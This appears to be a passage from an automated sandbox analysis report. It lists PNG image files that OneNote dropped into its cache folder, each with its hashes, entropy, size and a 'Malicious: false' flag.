Preview:	.PNG........IHDR.............IC......sRGB.........gAMA......a.....pHYs..........o.d...cIDATx^..S[Y..I...B..`...N....t.q..j...+LU.....O..sF.!.I...w@..H.Q.w. ...s..{B.....2......i..q..z{.}^..............J.fQ.....r.\WWw.T....amt.t;...6\N.........z.n...].u.z..Q...?^........;;;;:NO.}.c....<-...........({.^....t.k...F..[m..:........R2...%.y.l^OOONN8)....\y....}...}}.}.Hy6.^.a.....\...!S....K..\|>......s.........l..P...LFWW.l..RK..b.h.h .3.F..\|.\|..~..........e.aa.........0H...<.Y.a`..xA!...7.X....xd=........h?o5........Ay....?6.............tb.9.j...S`](.,P...9.2j..?...z3wD.[......L3.Ng2G\|.......&..0ZK1u8.H.2...Z../..P(....BA..aL\|..a.Y:.....J...5^x..'.\..&S...L..U..;....<{..."..@x ....J.N...;....WIht.<..B......!HM...&z&..6u..hF..G.D..B..........A.....n...GG...,.,.Q....X,`"....r.........3d.{o.(/...3.H...x:sX....h.8... ....r <..DB. ...y.N...o....5.......L&w....v....w..D......!.a4...."8.U.\|.0m.(..zR>..=.+.L.....e....Yd2.-Z.7..D"..pX.I.....e5qYa._&..3..J..++

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\00000041.bin

Download File

Process:	C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
File Type:	PNG image data, 59 x 61, 8-bit/color RGB, non-interlaced
Category:	dropped
Size (bytes):	2210
Entropy (8bit):	7.86853667196985
Encrypted:	false
SSDEEP:	48:naUvGemgl0W5KMDRLEbGAnaHC7ew/fkDSCcE5FTaHWc:aerVlDRIewkXlrTa2c
MD5:	73E38124F94AD20A2F1571FBBE11AEEC
SHA1:	87FB8056DC7A0A3B70D51426771C4CCE2099CFE5
SHA-256:	A700B63B30CBBE5230CC5E977D651E178EA87E73EAB18C8D5FFB1362149ADDF7
SHA-512:	320FCE64DD6F975384BEC9267348CD5CD24A55B13BB09FEF1238C2216AD8ECABDCCC15601A079CE092ACFA4954829FFEB06FBB0631F6AE26E3A39E43C102048B
Malicious:	false
Preview:	.PNG........IHDR...;...=.............sRGB.........gAMA......a.....pHYs..........o.d...7IDAThC.yL.w...r..r....... ...Eq.nnN..i..[.e...-.d.M.dn...x.xmQAT.Q.RN9..EA.k..P`..=}..m.&~............oy....k...}}x..[....g59.}]...~i.SY......."....7Ow../......2...3f)n{..R..R......U?......O.{....c..pT.\.t....5.07.. .....07...7.o..,+.,.V.c...&..%.3I.....:v..\....6.....??..[.N...........nz..Z.B.........v.prs.q1V1\|..=':..`.bz..%s.cf.3..RyMNUeV..J.k.}D[~xo..d..c...sO.y\....B...c.07......Rp..J.......{b.......;u...s....N.gko.M...;6...6..c.X5.S..o..\....^).....(......y.72.^....s%...[.q!&Z....C-..+o.....I.....,Y.{......g.1.0..I}.....<.....T..}....t.!x&)..[.7....4.5..{....n.<...#I...:.....r.wW~..zr..9k.^.]KR.*W.J.n.")....%0...)...Fbb5`4'.X..E.../.t.&,t(...@9....\$..........].P..jdU......H;.$.'%}.l7........y..$.....Z..4.Cm.u#&.%N..1..+..8....y...U.(.T.....}.I..5r}...!..K....>f..3.C.G..X1.(<.Gb..b(....0Qv0F.......n.z.s.Y......\.,.h%1...QU..%.}B\|CW......sO..\.=..&3...,.

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\00000042.bin

Download File

Process:	C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
File Type:	PNG image data, 163 x 131, 8-bit/color RGB, non-interlaced
Category:	dropped
Size (bytes):	4847
Entropy (8bit):	7.950192613458318
Encrypted:	false
SSDEEP:	96:JnieMJz5Tz/gKVp93jQvcv16kjOzbapFJBkjcMNBqmQzOG8qx1QKnse8T:JieMJzph13Evcv16RfapFLxMNBo8qxan
MD5:	A1A1017A6A7928761CEB56D1D950E123
SHA1:	28272E9C7F816A1CE8F2033FC00F489005332365
SHA-256:	72F066CD34EA71D0E1B28FB60D663B0372C5254E1A8239C94A164EEF9389DB88
SHA-512:	10F4557F102230126BC86CD4B49C93365C38D5CBEAC51F4691B90D861098866A2BDEFEBA507731D4FA14367FEE430453BD716157F9074EF643F2B949B09E1530
Malicious:	false
Preview:	.PNG........IHDR.............n.<.....sRGB.........gAMA......a.....pHYs..........o.d....IDATx^.].\TU..}...E.0.T....L~....af..Z.....O..4..>Ms..Js_....5.E.d...Y....?\z.3..}.l..\|?~...{.....s.z..Y.............E.X.6...c..u...y..W.j....."}...l.i.`.!-!-......MKH.E.bi.d...b.X.)...X4 .vJ6-...;..+/.->Qyi.t...%.T..k;.U..y.C$[;..Gm.......v..*2..2..eee..."!..)...yy...III./..u........2....M.:''...W.....o..t...._.6m.... .`,k.T.v."..q.......s~~........O....ed.[W0X..HB.V.i.....<=..E^^......MyY..vpp...........^6.....aQQQaaa........]^^nkg../_.d`.%......L&k..B......?C....W.VVV6660t.J+K.:..%q.....e.cp....Kz..%.qZsAR\T.!......>55.R.u.W\\.L....T...K..rE.U.K.-9......y.y.......K....>...HWTT.e....+..B.......%%%......^...\|...M'.%.f!/..=p...{O..../...@...DP..hw8....7o>..A.mgg......7-']~.s.OE.E.\|=.......'%!y.......\.....MSn.i.........!...U.$0S .......Z.P.}[.%X[.;{....N.....\......6O.....'.N}.}s.m...E..V..f..r...4..~.......H..F.}....4,.R.=.......xT..4......./...,z

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\00000043.bin

Download File

Process:	C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
File Type:	PNG image data, 46 x 49, 8-bit/color RGB, non-interlaced
Category:	dropped
Size (bytes):	1604
Entropy (8bit):	7.814570704154439
Encrypted:	false
SSDEEP:	48:4gv2YZ4gWLpU9JcjREmXfFEV7NNkfKOgV60g0Z:KZgWLpSJcj+mPFGNkfngp
MD5:	3F1535054D4F9626F0EB10CEE47F076E
SHA1:	92EF4F27A33F7704952ECDBA4FA69C68FC32FD4B
SHA-256:	4AB29996D02D93CAD184DD05F7A027D00425B90F5657F1E51CC4C37297A0035A
SHA-512:	2E0EC758B2C28C8DB9F7B5EDBBE8130F049E66842F2F5CC1C013CF23F7C4443CD211BA297250471CDB4F91F1E3251C1E3F7E2151C576FD1A1AE6A36C3776C6E0
Malicious:	false
Preview:	.PNG........IHDR.......1.....[......sRGB.........gAMA......a.....pHYs..........o.d....IDATXG.iLTW... .23..,..6 ........kK.5...5..IMh..Tl......V.v.PZ.-F...".k.pCQ......#.../s>f..3s....<...=^'/.~.;.a....{>.g.....o..6k..k....E....O....aQ.j....X&vG......{u-....$...CX.....xhZ...Q...Z.........O...I..Id.h.....q..q.........Y..J7O7.R...~o...[....;.'n...u.g..>X....o.]}...>...._..u......5...2].......EodZ.R.i....=ryxh...C!..6$!..)..W,^...Q.y...Ay[...M'o...;..hh'....}.%...."..h.5.?=.y.x..2/gK...4.2P.(#S.F.G.o...!Mk...w/._1`.5....[U7.0..Z..w^..&/...G...Y...g..;...JF.t..,.~.'.X...uYd.E...+R....:2cHG9..YC..X..Eg.).r..+%%.t..6/...@....3....\|.O\|.0.:.l.;........_.....E.J"..:)..#R"..q....~r..-..%.4....b..Q....al..6......{.y...I1.Xs.}..y.;...u.\......sm.C..@ 2.AG.K..5..}.k ..~........4..<..PH\|.).Z.[H.G.iH.7UR.`..B.f......<.5n7.WR.c....I1.......<y.%...-..."Y@....)).(...I...y.z6...J2.s...c...z.G..Kj..^R...M..k>.PA.1>.s<.G...8.r.....dL..uF.(...q.P.j@...CPSc..^

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\00000044.bin

Download File

Process:	C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
File Type:	PNG image data, 46 x 49, 8-bit/color RGB, non-interlaced
Category:	dropped
Size (bytes):	1604
Entropy (8bit):	7.814570704154439
Encrypted:	false
SSDEEP:	48:4gv2YZ4gWLpU9JcjREmXfFEV7NNkfKOgV60g0Z:KZgWLpSJcj+mPFGNkfngp
MD5:	3F1535054D4F9626F0EB10CEE47F076E
SHA1:	92EF4F27A33F7704952ECDBA4FA69C68FC32FD4B
SHA-256:	4AB29996D02D93CAD184DD05F7A027D00425B90F5657F1E51CC4C37297A0035A
SHA-512:	2E0EC758B2C28C8DB9F7B5EDBBE8130F049E66842F2F5CC1C013CF23F7C4443CD211BA297250471CDB4F91F1E3251C1E3F7E2151C576FD1A1AE6A36C3776C6E0
Malicious:	false
Preview:	.PNG........IHDR.......1.....[......sRGB.........gAMA......a.....pHYs..........o.d....IDATXG.iLTW... .23..,..6 ........kK.5...5..IMh..Tl......V.v.PZ.-F...".k.pCQ......#.../s>f..3s....<...=^'/.~.;.a....{>.g.....o..6k..k....E....O....aQ.j....X&vG......{u-....$...CX.....xhZ...Q...Z.........O...I..Id.h.....q..q.........Y..J7O7.R...~o...[....;.'n...u.g..>X....o.]}...>...._..u......5...2].......EodZ.R.i....=ryxh...C!..6$!..)..W,^...Q.y...Ay[...M'o...;..hh'....}.%...."..h.5.?=.y.x..2/gK...4.2P.(#S.F.G.o...!Mk...w/._1`.5....[U7.0..Z..w^..&/...G...Y...g..;...JF.t..,.~.'.X...uYd.E...+R....:2cHG9..YC..X..Eg.).r..+%%.t..6/...@....3....\|.O\|.0.:.l.;........_.....E.J"..:)..#R"..q....~r..-..%.4....b..Q....al..6......{.y...I1.Xs.}..y.;...u.\......sm.C..@ 2.AG.K..5..}.k ..~........4..<..PH\|.).Z.[H.G.iH.7UR.`..B.f......<.5n7.WR.c....I1.......<y.%...-..."Y@....)).(...I...y.z6...J2.s...c...z.G..Kj..^R...M..k>.PA.1>.s<.G...8.r.....dL..uF.(...q.P.j@...CPSc..^

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\00000045.bin

Download File

Process:	C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
File Type:	PNG image data, 46 x 49, 8-bit/color RGB, non-interlaced
Category:	dropped
Size (bytes):	1604
Entropy (8bit):	7.814570704154439
Encrypted:	false
SSDEEP:	48:4gv2YZ4gWLpU9JcjREmXfFEV7NNkfKOgV60g0Z:KZgWLpSJcj+mPFGNkfngp
MD5:	3F1535054D4F9626F0EB10CEE47F076E
SHA1:	92EF4F27A33F7704952ECDBA4FA69C68FC32FD4B
SHA-256:	4AB29996D02D93CAD184DD05F7A027D00425B90F5657F1E51CC4C37297A0035A
SHA-512:	2E0EC758B2C28C8DB9F7B5EDBBE8130F049E66842F2F5CC1C013CF23F7C4443CD211BA297250471CDB4F91F1E3251C1E3F7E2151C576FD1A1AE6A36C3776C6E0
Malicious:	false
Preview:	.PNG........IHDR.......1.....[......sRGB.........gAMA......a.....pHYs..........o.d....IDATXG.iLTW... .23..,..6 ........kK.5...5..IMh..Tl......V.v.PZ.-F...".k.pCQ......#.../s>f..3s....<...=^'/.~.;.a....{>.g.....o..6k..k....E....O....aQ.j....X&vG......{u-....$...CX.....xhZ...Q...Z.........O...I..Id.h.....q..q.........Y..J7O7.R...~o...[....;.'n...u.g..>X....o.]}...>...._..u......5...2].......EodZ.R.i....=ryxh...C!..6$!..)..W,^...Q.y...Ay[...M'o...;..hh'....}.%...."..h.5.?=.y.x..2/gK...4.2P.(#S.F.G.o...!Mk...w/._1`.5....[U7.0..Z..w^..&/...G...Y...g..;...JF.t..,.~.'.X...uYd.E...+R....:2cHG9..YC..X..Eg.).r..+%%.t..6/...@....3....\|.O\|.0.:.l.;........_.....E.J"..:)..#R"..q....~r..-..%.4....b..Q....al..6......{.y...I1.Xs.}..y.;...u.\......sm.C..@ 2.AG.K..5..}.k ..~........4..<..PH\|.).Z.[H.G.iH.7UR.`..B.f......<.5n7.WR.c....I1.......<y.%...-..."Y@....)).(...I...y.z6...J2.s...c...z.G..Kj..^R...M..k>.PA.1>.s<.G...8.r.....dL..uF.(...q.P.j@...CPSc..^

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\00000046.bin

Download File

Process:	C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
File Type:	PNG image data, 127 x 138, 8-bit/color RGB, non-interlaced
Category:	dropped
Size (bytes):	2232
Entropy (8bit):	7.837610270261933
Encrypted:	false
SSDEEP:	48:dFQY2WmQbe+TukEC2KgYPsWOuWFk792oP/sWtGOK9Lc+rD0NTHj:3L+wKkEOgx3PG92Eqt9LczFD
MD5:	EDB5ED43CC6038500A54B90BEC493628
SHA1:	A8CD63F3914E4347F4C5552FB922C6C03917F45F
SHA-256:	9F3312E33EB78C6952B5A5D881BBD18751FCFAC41D648C6F053CE781342A504F
SHA-512:	4EBCEFD69A4C249AA3B0F00A954C4E463DA22FC9CA0B61A0DC46079B438138C509B22188D966FFF6599A3A604858BC4CC8FE6E0685A764E8E0477AB7A237DB32
Malicious:	false
Preview:	.PNG........IHDR.....................sRGB.........gAMA......a.....pHYs..........o.d...MIDATx^..hVU..}..s:..6..9g.MM3...j...........A..!.A.....R.Ai%YH..(M.".h.cf.B.......:...{w.{.......y.s>.{.{.=.........#.y..r.K...K.0}......Y..b..[N.=....j.=........!......./.6....B.8....p....5P)....@......=}............^.~..@.o`n<.q.....Yw]..mg\V...y.W.T.>...\n...s.iG.~L]..d.<.8..j<.<1..4...CZ0...}...........oDDh.....]3}#"B..O........0}B.F.L......5.f.FD..L....5.7""4`..p.........'.kt.....>!\.k.oDDh.....]3}#"B..O........0}B.F.L......5.f.FD..I..x........Z^...>B$1.N"}4.....1:&F8...X.yL(..s.3......~2.EL%.w.Uc.zJ...B..S..b.7o\|%..7..'.....N.\|..Vi...q..uO,`/....\W{..y...&iI..\|X&T.........-........Z..o.~u..U....cF.M....O4}......~......:T..W.._s...t..Dlb.$Pr././.._4.b......R.T$t..$.>hB. +.{......m.w .Q...05..C.}...}.....?..h.....Y .8.6^t....}.y.%......l=$..[.~..]..h..N.......*....SB.\|....8..H......_...G...\|......;6YQ\|WO.o.}]..'.$..oE.y...i'9.[cmS..@m@.Q

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\00000047.bin

Download File

Process:	C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
File Type:	PNG image data, 651 x 254, 8-bit/color RGB, non-interlaced
Category:	dropped
Size (bytes):	19235
Entropy (8bit):	7.944867159042578
Encrypted:	false
SSDEEP:	384:h4iuxL3Yck5lpMcTyHOypEod/G38lJxqSp5BCU:h4/xjYc2lmcOuuEoJM8fse5BCU
MD5:	AE32E846559D576FD263BD69FEDBEC28
SHA1:	D481DF71C858BAECFE33418002D368F2DCF68D4A
SHA-256:	6E21222B0EADAB8D3CFB0C7D14941D196165D6709271AF317D099F12403CD352
SHA-512:	9AA4A6DD01D3B745D674721765F2BFCCAB584CA0603F222EDBE9A88190A2A57438041E7A3706CC0656A6ABB79AA18118319F210EFFE3DD917E7B94A6294BD346
Malicious:	false
Preview:	.PNG........IHDR.....................sRGB.........gAMA......a.....pHYs..........o.d..J.IDATx^...X.W....D..A......bW.A..[..5.F..D...7.ob71.....b.."...("...(...{/...e......}.....;...S.X...H...@d...... &.....b..... F.....b..... F.....b..... F.....b..... F.....b..... F.....b..... F.....b..O.KVfVfjFzJzVF.}i{.R..l..q..`I....e.'./.'.G.z.!&>)61.UjVzf..4>Q~...U..=......s.\..WE...2...t..`F....M....'..?.......>BO(m.V.P....Gy.../........B.6.......=\|z7.Z.\|hQ..u..j............&..Z.bo?.u...S7.G>......]I..7.i...3....<.y.l]....SI>...L.2..<.....[.'=M.Tsprp...T....cE'..P........eefQ.NKN.x....:-#5#....q/..xq.YzJ:.T.u.j..S.C=...\|.....2..(YF........\|....7t...{.jz....W..Y..{...nlfj...L.6.[.hS.=.....(!C.......?5..+...[..a.:U.K..C.......w......+..r@.z.7..j..qB..B.....X}..=.fk...>^5[....n.z....wn....Z4.._iWG.^..z6./]t......dhM.9s...Gbo?...U.V..tj.......*&)Io.{q.G...A...l...i7...&....d.E]....#.W.x,.T...&Mz4+].4.$n..F..x...<.ppr.............y.,i./..

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\00000048.bin

Download File

Process:	C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
File Type:	PNG image data, 46 x 49, 8-bit/color RGB, non-interlaced
Category:	dropped
Size (bytes):	1604
Entropy (8bit):	7.814570704154439
Encrypted:	false
SSDEEP:	48:4gv2YZ4gWLpU9JcjREmXfFEV7NNkfKOgV60g0Z:KZgWLpSJcj+mPFGNkfngp
MD5:	3F1535054D4F9626F0EB10CEE47F076E
SHA1:	92EF4F27A33F7704952ECDBA4FA69C68FC32FD4B
SHA-256:	4AB29996D02D93CAD184DD05F7A027D00425B90F5657F1E51CC4C37297A0035A
SHA-512:	2E0EC758B2C28C8DB9F7B5EDBBE8130F049E66842F2F5CC1C013CF23F7C4443CD211BA297250471CDB4F91F1E3251C1E3F7E2151C576FD1A1AE6A36C3776C6E0
Malicious:	false
Preview:	.PNG........IHDR.......1.....[......sRGB.........gAMA......a.....pHYs..........o.d....IDATXG.iLTW... .23..,..6 ........kK.5...5..IMh..Tl......V.v.PZ.-F...".k.pCQ......#.../s>f..3s....<...=^'/.~.;.a....{>.g.....o..6k..k....E....O....aQ.j....X&vG......{u-....$...CX.....xhZ...Q...Z.........O...I..Id.h.....q..q.........Y..J7O7.R...~o...[....;.'n...u.g..>X....o.]}...>...._..u......5...2].......EodZ.R.i....=ryxh...C!..6$!..)..W,^...Q.y...Ay[...M'o...;..hh'....}.%...."..h.5.?=.y.x..2/gK...4.2P.(#S.F.G.o...!Mk...w/._1`.5....[U7.0..Z..w^..&/...G...Y...g..;...JF.t..,.~.'.X...uYd.E...+R....:2cHG9..YC..X..Eg.).r..+%%.t..6/...@....3....\|.O\|.0.:.l.;........_.....E.J"..:)..#R"..q....~r..-..%.4....b..Q....al..6......{.y...I1.Xs.}..y.;...u.\......sm.C..@ 2.AG.K..5..}.k ..~........4..<..PH\|.).Z.[H.G.iH.7UR.`..B.f......<.5n7.WR.c....I1.......<y.%...-..."Y@....)).(...I...y.z6...J2.s...c...z.G..Kj..^R...M..k>.PA.1>.s<.G...8.r.....dL..uF.(...q.P.j@...CPSc..^

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\00000049.bin

Download File

Process:	C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
File Type:	PNG image data, 167 x 131, 8-bit/color RGB, non-interlaced
Category:	dropped
Size (bytes):	5386
Entropy (8bit):	7.943706538857394
Encrypted:	false
SSDEEP:	96:x4F84/zVJWedudPZZRdbvczHe2ftFJ0y8Ea5b2AELJj:x4FTnodRZ7c7LrabEaMAGp
MD5:	DB48555480A383CD1D4DD00E2BCFCF29
SHA1:	8060B6FE12175289F0A71F45B894030A0D9F1AB5
SHA-256:	807723D8F90A5BD41269A7A62817547026A117D666D5BEF454EB699C97CA3FA2
SHA-512:	2614C04686299CEE8D56577A1E836A26076D42E041C627177FDB295629F6A80190910947FA794A094C55A45C3D70725EEF29097118E523A38B50C9263C771A41
Malicious:	false
Preview:	.PNG........IHDR.............gI......sRGB.........gAMA......a.....pHYs..........o.d....IDATx^..xTU..M..B...P........)vQpQ.ED.""......,."....bC..VT.. M!...@z....1...Wf.w..o29...=.v.TUU..^..@....S..<..;h...5.9r....x..7N{...=........'...N...u...9..5+YW.;..N\..u...9..5.....O....,.K..'.../.....1..T....>.f..9.xo...u.xo...u.xo...u.xo...u.xo...u.xo...u.xo...u.xo........'L...g.UVVz.[.n)...Yqq...Y.f.)//_.l.W_}.,........S^Z^Y..++...pF.....?...I.&...O,.k.d...~..w;Q........7}1y......e_............=y._U....{..}.w.O..~.z.{........W\q.."........^.h........}p.+.>m...d...4...`a~Z^....me......:N]..1...g..y.f.......l..g.).......e[........Z..RB.KrJ.....#...{..eff..v.[[<.n..?{.....SN9%...V.yE...s2..........e@Wz..I...B.r..<.-.=/t{.v.\|..J....,.@.A.v...s`/.....6f....L?.z[T7..)S0.;c....\s..z-C.....v..}Y..{..j..xF.....'.#_..C....k\|3..8...N...5......f....3......f)-.p..%.D.v.v.].f.......33<<......[bbbt.]w...:.r.....z....q..=....m.uhD..,..zXg

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\0000004B.bin

Download File

Process:	C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
File Type:	PNG image data, 162 x 89, 8-bit/color RGB, non-interlaced
Category:	dropped
Size (bytes):	4081
Entropy (8bit):	7.943373267196131
Encrypted:	false
SSDEEP:	96:KQJAeRumk2zXWySlEmWL9zi6wknB4qLx+ppNhQrW8Oy:Ke9S482LE6wQB6pNeqi
MD5:	29B87BEEC5D3899824AA390530CD47FB
SHA1:	55108E8E5692E4444F72EE5CEB91915E7A2AEFC8
SHA-256:	F00E4F1C9B1D9ABEAAEC8E5CAB02A07FD74F00ACE15E36C6F6469DE5AB07A9FC
SHA-512:	1A5AD45BBA8C29C32CDD3C4D1E460C30ECA305D851FAAC73DF165306BC338337525680B9906D367A0CD3852B9D2DAAA8FD0603276BA969495B4E29C7EC8A3530
Malicious:	false
Preview:	.PNG........IHDR.......Y.....2.h.....sRGB.........gAMA......a.....pHYs..........o.d....IDATx^.].LTW.f..O.a............k...M.Z.n.q.h....ht.f.M.n.6..t.h.k.h5.6][[....X..p...?..g.`..7.o..of....^.ys..{.{...s.UMMM.(.l.@.l..R?.......(0+0.......5....F..#.].........1.....B[>[..a..L.....x...0.5t.v..S.h!.........Y....B..&.......f#.w5u...............0...x.sC....a.4j5V..Z..n....K..>...3t..wm..3hB.BD.P..FkcJ6.....O........7...S.........6..P.]mf.+o....w..<.......Y..Z.whd.....zf+.....#."_?....`.._... qf+.?.?"k...zgME..j..!.k.U.....&z..N....ma.......R.{.r0.S..KP..fU....g~..=..Q.n.. 8T=/'9,.KDW...GN;0(P3_....1......'.;..;\|.L.a.&<\.d......o...Y... {E.F..}.e.\..=W..#..W....c./~..b.EWXI.#.''&.........:....X...b.....+2...5..6+)we~ja:lZ.d.Ey....l.2.5r........!.!._\|.A.....j2.5.o.....WOM....V......GC9..'.... ....C..,._...cS....b.1.....t.........._........a.3..K..>V.f]...~....K...-........#.o.Y.P........a.7..,#..'s...T.....b..]..3..dPPP..Y.i...c.b

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\0000004C.bin

Download File

Process:	C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
File Type:	PNG image data, 453 x 278, 8-bit/color RGB, non-interlaced
Category:	dropped
Size (bytes):	11332
Entropy (8bit):	7.9324721568775285
Encrypted:	false
SSDEEP:	192:vpXZavBpl00n1Pt7JquG9GYHDK/5cxektxMQjcie9ZZkx30eXJIb8FKRN:vpZaDyc1P1Je9G62/5clpjre9nQkeXJY
MD5:	31579CA3352DF8FA4E3E7F48C7CDF672
SHA1:	AA682A3C781BF8EE43B5EDC9718E64CB79135F25
SHA-256:	B0E7824BEE2C896279457D87E61E902431BEB528D830524CC4DFAE126E89FC24
SHA-512:	782FF9492E3ECB11C72D316DDD94D1F3E94CD908FC9452A37DA6CA30ABCFE9AB2BCCED8583A569DA68626BCEC730408AF86997E295637BF64AFF5BC768F3E309
Malicious:	false
Preview:	.PNG........IHDR................R....sRGB.........gAMA......a.....pHYs..........o.d..+.IDATx^.{...u./-...&....6..+z..Q."b. &M.d-e... ....J..Z-T.Z$....R..F...%*`bn..<.....W.E ..w....^...;g..[w.5w.9g...3......t8t.P.?$@.$@.5...=.8qb.... ...5...a=...#.y. ...@B.....am. .. .......$@.$`.....G.B.$@..S... ...C.zj.#[!.. ..).......!@=..........}..H.........VH..H.z.>@.$@.v.PO.pd+$@.$@=e. .. .;...v8... ...................f.o_o{....~t...n.S.N..?..._..L;J.H ..,....7.}...\|....7...b...\|.........ObVa1. .?.X.....~.....t2..V>.b.}..0.F....%`GO7.n#~..F....K.~...FX..H.^....k.Z/.2v.W..M.<.;$...v.t..,UO.-]............D.....o.J..Y........5.%.l....{.....'O..dC$....=uks..;{x.,.N.=.."..Q]..w>.E.H........AV=...f.&. ..ip}._0.~[pf.`..9..v.W.,..2.E.$P........+...OcC.H..=..\|..[..g%(h.....W...?...UDh..T$..?....\|.]..)?[Wo.h.'..2P.1..!.......$.NO.5..}...c.;...~.x,\|Q....B..6.@>..y..}...m...D~z....L#.0`_.`.s?\|....I.....a...=N....c.._.2.._..6 .]...5....{.^>.lM..;n...k..9J..S.G..{.

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\0000004D.bin

Download File

Process:	C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
File Type:	PNG image data, 171 x 50, 8-bit/color RGB, non-interlaced
Category:	dropped
Size (bytes):	2270
Entropy (8bit):	7.845368393313232
Encrypted:	false
SSDEEP:	48:3Cxnazs22lovji2Ez2iqBU2C+hJWizJNzIu1coqAYClBeMsk1:3dm2Ez2iUhBzhyjAxqQ
MD5:	6EFE6733E10E011FFDD6711B5F37C9E2
SHA1:	C72549E824EAD899944A38C46FBC28BDCDAAD611
SHA-256:	92B5056DAA03DF3EA85AF49FFE4F9CFE8699BDF3539576A99F02418FF49AD9CB
SHA-512:	EC14B553A5780CD9B33D438CE13A6932DE43E346D8D2DEC8D093A6A2048675423948F8E2C604A73460980C3C68D9276B65D76C2A6BC7B24FDF10CA92FDA2583E
Malicious:	false
Preview:	.PNG........IHDR.......2............sRGB.........gAMA......a.....pHYs..........o.d...sIDATx^.\kL.W....F......@..(H4."iI}..B!.iD...I-....y.I.h.....<..1.....C..(XSy.l....,-,.......3..3...;.{...{.{g.....Q..x.T/q...F.V...B..'..?{:.:...`.........+.0s.e...w....{.`. ....5...d..9S]../............$Y.>.I....i..8....;,r8r!Ee'"..!.&E.....n...=.@..Sp.GF..c....1QH3....?,.T.el......t?..([Q`.0....k.G.....X..C...k\|p...I.q;.d..N....c.u.a.5.%.k.fS\)..H..T.~lk.[.n...x2.1...........%...yK..a..l.[.?#..fD%.FMT. =r.jt^..fT...c.&..Lr..............\..V.ll....Br^6..U27...O..N..K.gm.K..g.;..l..Fe...w?..Q.E......0.........7...(.e..t...x.c6..Q..n.92:%....l..4.h]Z.....w..\|..!.p.~..B.y..&.......gl...\.wI......G.6.K.$...%.-.h]\8.LT.....}{a...^.i......4.0.ji...........n.pk ......7t....U9..b...I.....#...<q..(\|=F.......0@^......+..........X. .>p....S..t.].f.x.0....7d..n..'..'... .M.qqn...G.t8'.=..V.PK....K...X.z.#..I.....@...Y....BH..I.....,..K....=`&Z.41$..a'o.:....i{o

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\0000004E.bin

Download File

Process:	C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
File Type:	PNG image data, 453 x 278, 8-bit/color RGB, non-interlaced
Category:	dropped
Size (bytes):	14553
Entropy (8bit):	7.951135681293377
Encrypted:	false
SSDEEP:	384:EF7aDrPYJ1n3kaEf61xD+KvdokCixTQm7QA96dNT:EF7a/PMeaEf61lT6kCiFQCQq6zT
MD5:	3E9F7D399DF9CAD3669B7A5445EF7074
SHA1:	2FBC965DC03EF9203581F595E0D7AB1734726ED7
SHA-256:	76C80E31F37248C3C787F7972A7B22038390F9D81E72E650071A6F36D36AF27A
SHA-512:	326F8F9CBF829BF80AAA96062A57255A36EE04DE310634327AA075D14129CFA8E36E48AB2A00B10F9BDC1D94F1AC7A9E41D0D063361920A0332EC124BDF4C3EE
Malicious:	false
Preview:	.PNG........IHDR................R....sRGB.........gAMA......a.....pHYs..........o.d..8nIDATx^..xT...!=!$..%t..H.tP:.HQP@E,...QQ.^.....* E.(" ]:.K..R......p..n.9{...sv.}.....7.....o..z...,\|.......M +.....w........O...>.SJ.O...<...{. .x..g..I..H.......V .. .}.PO..H+$@.$@=.=@.$@.......VH..H.z.{..H...!@=.#...............C.z..GZ!.. ..)... .....T...B.$@..S..$@.$....>.i..H......H..H@...S}8......POy......>....p... ...... .. .}.PO..H+$@.$@=.=@.$@.......VH..H..zz?.......$@.$`i......c;.n..i...0..........<......S....w..c.....y..F4.p..3~..\|.]....s.6[..H...N@.=M..\|`...3./...I.....'..\|..K...r\|...nX...'.. .G...ib\|...MY8\|......9x..Ur'.. ._ .....5..H..d..L.$@..I..o.;kM.$.?........K/.wn......Y....E..%K.=.......Y.3.!k....[V..WG/?i..H..." T.,z...6h.[..-%9....WMY...z.vH..H@/.BOe....g-P.@.......lH.O...SJ}5.\|....?.^..5^}..$.. .....S.@...<.gJT/......_.R.C.....rj..Cg'\K........K....~Y....l@..)..l.k.s..Yr.....Z]jG..q.+..G...;lNJj.}..T1&&.. .....?...\|....W<{...g.&'Ca

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\0000004F.bin

Download File

Process:	C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
File Type:	PNG image data, 453 x 278, 8-bit/color RGB, non-interlaced
Category:	dropped
Size (bytes):	11886
Entropy (8bit):	7.946442244439929
Encrypted:	false
SSDEEP:	192:sqNuEpzsnKxkfLaZCdMh+cLApmRausyZwYMAisQKShDBlhr34ckckcZ:JNu6DMLaZsMhtLAIa0wYMAvI5V4DDQ
MD5:	875CFB3B5C3619253223731E8C9879E5
SHA1:	6372F4F5BEB6EEAE3EDBE5B62EE73039B40AD01E
SHA-256:	CC69BAE5D2C8F56B28BA4E3C6A11F57C4E8CCCE69943ACFBE7E63B4FC90EE5F2
SHA-512:	47F45A3275B8454F8000F4567153DD7D4AF3012005D8E34CB18AED6AD69083BEC753E607F275FBF3EFCCB7BA00310A04ADFBD5FA5B73E6BBE47CE73901C35CA8
Malicious:	false
